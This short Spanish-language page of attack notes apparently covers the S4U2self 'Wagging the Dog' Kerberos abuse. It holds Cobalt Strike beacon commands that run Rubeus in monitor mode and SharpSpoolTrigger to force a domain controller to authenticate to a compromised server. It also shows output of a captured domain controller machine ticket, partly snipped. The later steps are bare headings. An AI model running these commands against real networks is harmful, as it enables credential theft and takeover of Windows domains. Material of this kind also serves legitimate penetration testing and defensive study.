S4U2self
Paso 1: Forzar la Autenticación y Capturar el TGT
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe monitor /interval:5 /nowrapbeacon> execute-assembly C:\Tools\SharpSystemTriggers\SharpSpoolTrigger\bin\Release\SharpSpoolTrigger.exe [CONTROLADOR_DOMINIO] [SERVIDOR_COMPROMETIDO]
NdrClientCall2x64[-]RpcRemoteFindFirstPrinterChangeNotificationEx status: 6[*] 21/02/2025 11:54:39 UTC - Found new TGT:
User : [CONTROLADOR_DOMINIO]$@[DOMINIO.COM]
StartTime : 21/02/2025 10:39:21
EndTime : 21/02/2025 20:38:58
RenewTill : 28/02/2025 10:38:58
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket : doIFt[...snip...]5DT00=Paso 2: El Problema (Por qué el TGT de la Máquina no es Suficiente)
Paso 3: La Solución (El Abuso de S4U2self "Wagging the Dog")
Última actualización